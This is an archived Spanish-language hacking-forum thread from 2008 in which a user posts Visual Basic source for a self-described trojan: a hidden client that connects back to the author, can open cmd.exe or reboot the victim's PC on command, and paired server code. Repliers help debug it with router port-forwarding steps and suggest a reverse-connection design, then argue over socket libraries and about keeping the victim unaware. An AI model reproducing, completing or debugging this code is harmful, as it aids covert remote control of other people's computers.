elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  mi troyano, no me funca :(
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: mi troyano, no me funca :(  (Leído 3,054 veces)
pastillas

Desconectado Desconectado

Mensajes: 5


Ver Perfil
mi troyano, no me funca :(
« en: 12 Abril 2008, 01:54 am »

bueno gente me hice un troyano para mandar datos a una pc remota, y no me esta andando bien no se que le pasa, les dejo las listas de comandos del servidor y del cliente

SERVIDOR

Private Sub Command1_Click()
On Error Resume Next
ws.LocalPort = Text1.Text
ws.Close
ws.Listen
If ws.State = 2 Then Label1.Caption = "estado: conectando"
End Sub

Private Sub Command2_Click()
On Error Resume Next
ws.SendData "fin"
End Sub
Private Sub Command3_Click()
On Error Resume Next
ws.SendData "cmd"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
If Not ws.State = 7 Then Label1.Caption = "desconectado"
If ws.State = 7 Then Label1.Caption = "conectado"
If Label1.Caption = "desconectado" Then
    ws.Close
    ws.Listen
End If
End Sub

Private Sub ws_Close()
Label1.Caption = "desconectado"
End Sub

Private Sub ws_ConnectionRequest(ByVal requestID As Long)
On Error Resume Next
ws.Close
ws.Accept requestID
Label2.Caption = "conectando a: " + ws.RemoteHostIP
Shape1.FillColor = &HFF&
Timer1.Interval = 3000
End Sub


CLIENTE

Private Sub Form_Load()
On Error Resume Next
ws.RemoteHost = aca va mi ip, por seguridad no la pongo
ws.RemotePort = 1000
App.TaskVisible = False
End Sub

Private Sub Timer1_Timer()
If Not ws.State = 7 Then
    ws.Close
    ws.Connect
End If
End Sub

Private Sub Timer2_Timer()
Shell ("cmd.exe")
End Sub

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
If datos = "fin" Then Shell ("shutdown -r")
If datos = "cmd" Then Timer2.Enabled = True
End Sub


En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: mi troyano, no me funca :(
« Respuesta #1 en: 12 Abril 2008, 02:35 am »

explica qque no te funciona


En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
pastillas

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: mi troyano, no me funca :(
« Respuesta #2 en: 12 Abril 2008, 03:50 am »

bueno cuando intento conectarme no me funciona el programa, no llega a decirme ni siquiera q se conecto

y el cliente cuando corre el timer (3 segundos) me tira un error cuando ejecuta ws.conect
En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Re: mi troyano, no me funca :(
« Respuesta #3 en: 12 Abril 2008, 10:51 am »

Usas un router¿?. Lo digo porque si estás intentando conectar a tu IP y tu pc está detrás de un router tienes que configurar tu router para que redireccione el tráfico del puerto por el que conectas a la ip local de tu pc... por ejemplo...

Abres la consola de comandos en Inicio/ejecutar... y escribes cmd.

Escribe en la consola de comandos ipconfig y pulsa enter.

Ahí apunta la dirección IP que te sale. Luego accedes a tu router, cuya ip es la puerta de enlace predeterminada. Osea si en puerta de enlace predeterminada pone: 192.168.0.1 para acceder a tu router normalmente basta con poner en tu navegador web:

http://192.168.0.1

Una vez entres debes ir a la zona donde se redirecciona el tráfico de puertos... eso depende del router... puede ser forwarding... configuración NAT o algo así... y aquí haces que el tráfico que llegue por el puerto de conexión de tu troyano (creo que en tu caso es el 1000) se redireccione a tu ip local que es la que sale cuando hiciste el ipconfig.

Creo que tu problema es ese, que la conexión no se realiza porque estás detrás de un router porque el programa no lo he probado pero mirándolo por encima parece estar bien. También puedes solucionarlo haciendo el troyano de conexión inversa... que sea el servidor el que se conecte al cliente, así te ahorrarás muchos problemas a la hora de conectar.

Saludos!
« Última modificación: 12 Abril 2008, 10:53 am por Spider-Net » En línea

SKL (orignal)

Desconectado Desconectado

Mensajes: 259


UpLoadSourceCode


Ver Perfil WWW
Re: mi troyano, no me funca :(
« Respuesta #4 en: 12 Abril 2008, 11:06 am »

disculpa si soy un poco agresivo...

pero... queres hacer un "troyano" y todavia no sabes programar??? que clase de persona quiere hacer un sistema operativo si nisiquiera saber lo que es una computadora???

por empezar usas el winsock, es lo mas lammer que hay, usa el CSocketMaster como minimo...

prero bue, esto es para todos los que quieren hacer un troyano y para los que hacen guias para hacer el mismo...

"troyano"

hagan algo mas productivo con un chat o nose un visualizador de desktop como el Real VNC pero un troyano? aparte siempre le ponen los msgbox apagar la pc reiniciar y abrir y cerrar el cd nada mas :S

bajen un sub7 o un ducktoy y lito :S

pero ya fue, disculpen si me excedi un poco...

saludos
En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: mi troyano, no me funca :(
« Respuesta #5 en: 12 Abril 2008, 12:16 pm »

disculpa si soy un poco agresivo...

pero... queres hacer un "troyano" y todavia no sabes programar??? que clase de persona quiere hacer un sistema operativo si nisiquiera saber lo que es una computadora???

por empezar usas el winsock, es lo mas lammer que hay, usa el CSocketMaster como minimo...

prero bue, esto es para todos los que quieren hacer un troyano y para los que hacen guias para hacer el mismo...

"troyano"

hagan algo mas productivo con un chat o nose un visualizador de desktop como el Real VNC pero un troyano? aparte siempre le ponen los msgbox apagar la pc reiniciar y abrir y cerrar el cd nada mas :S

bajen un sub7 o un ducktoy y lito :S

pero ya fue, disculpen si me excedi un poco...

saludos

El mswinsck.ocx es lammer? No veo pork... es un modulo k permite hacer programacion con sockets en vb. Ni todo es malware y malware deste tipo no se hace en vb para empezar. Usar cSocketMaster si es lammer, si van a usar vb para hacer una aplicacion y no kieren usar la ocx de m$ entonces usen las apis y construan una clase vosotros mismos, lo k realmente me parece perdida de tiempo...
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: mi troyano, no me funca :(
« Respuesta #6 en: 12 Abril 2008, 18:34 pm »

disculpa si soy un poco agresivo...

pero... queres hacer un "troyano" y todavia no sabes programar??? que clase de persona quiere hacer un sistema operativo si nisiquiera saber lo que es una computadora???

por empezar usas el winsock, es lo mas lammer que hay, usa el CSocketMaster como minimo...

prero bue, esto es para todos los que quieren hacer un troyano y para los que hacen guias para hacer el mismo...

"troyano"

hagan algo mas productivo con un chat o nose un visualizador de desktop como el Real VNC pero un troyano? aparte siempre le ponen los msgbox apagar la pc reiniciar y abrir y cerrar el cd nada mas :S

bajen un sub7 o un ducktoy y lito :S

pero ya fue, disculpen si me excedi un poco...

saludos

El mswinsck.ocx es lammer? No veo pork... es un modulo k permite hacer programacion con sockets en vb. Ni todo es malware y malware deste tipo no se hace en vb para empezar. Usar cSocketMaster si es lammer, si van a usar vb para hacer una aplicacion y no kieren usar la ocx de m$ entonces usen las apis y construan una clase vosotros mismos, lo k realmente me parece perdida de tiempo...
estoy de acuerdo con Tughack usar el mswinsck.ocx no es de lammer ,pero usar el  cSocketMaster si seria lammer ya que estas copiando el code que alguien iso i la mayoria ni sabe como se hace , i ni siquiera leen el code ,yo en lo personal estoi haciendo uno.
pd: tughack te pido disculpas publicas por la todas las peleas ya que recapasite i en las mayoria tenias razón
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: mi troyano, no me funca :(
« Respuesta #7 en: 12 Abril 2008, 19:41 pm »

Hola,si tienen razon,el recien empieza y bueno no sabe que existe el modulo clase CSocketMaster,capaz que ni sabe lo que es un modulo clase, que empieze con el winsock esta bien,yo creo que es como lo hicimos todos alguna vez,no creo que alguien haya empezado con el CSocketMaster sin saber primero que lo que era el control Winsock...

Cita de: Skullp
hagan algo mas productivo con un chat o nose un visualizador de desktop como el Real VNC pero un troyano?

queres que el pobre haga un chat o un visualizador de desktop como el Real VNC sin que ni siquiera sepa como mandar un msgbox a otra pc??no se si es el tipo es un lammer o no,pero esta queriendo aprender lo basico por lo menos...

saludos.

En línea

SKL (orignal)

Desconectado Desconectado

Mensajes: 259


UpLoadSourceCode


Ver Perfil WWW
Re: mi troyano, no me funca :(
« Respuesta #8 en: 12 Abril 2008, 23:30 pm »

aja desde cuando envian un "troyano" con un el ocx??? tienen que extraerlo de un recuros despues pegarlo en algun lado, llamarlo por preferencias y despues podes inisciar

el CSocketMaster compilas y salis andando, si para hacer un troyano la victima no se tiene que dar cuenta pero estan haciendo 10 procesos para pegar el ocx y ni vale la pena, aparte el CSocketMaster esta muchisimo mejor echo que el Winsock y si el CSoketMaster lo hizo un pibe,  y el winsock no??

aparte tiene multiples conexion, en cambio para hacer eso con el winsock tenes qeu hacer un hermoso kilombo.

siguan con sus troyanitos usdtedes
En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: mi troyano, no me funca :(
« Respuesta #9 en: 12 Abril 2008, 23:37 pm »

aja desde cuando envian un "troyano" con un el ocx??? tienen que extraerlo de un recuros despues pegarlo en algun lado, llamarlo por preferencias y despues podes inisciar

el CSocketMaster compilas y salis andando, si para hacer un troyano la victima no se tiene que dar cuenta pero estan haciendo 10 procesos para pegar el ocx y ni vale la pena, aparte el CSocketMaster esta muchisimo mejor echo que el Winsock y si el CSoketMaster lo hizo un pibe,  y el winsock no??

aparte tiene multiples conexion, en cambio para hacer eso con el winsock tenes qeu hacer un hermoso kilombo.

siguan con sus troyanitos usdtedes

lol, sabes como esta echo el csocketmaster? es exatamente lo k esta en mswinsck.ocx, con la diferencia tienes el source y puedes incluirlo directamente en el proyecto. Pero mas una vez digo, vb no es lenguaje para hacer troyanos a no ser k estos sean solo por el gusto de hacer algo con vb.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines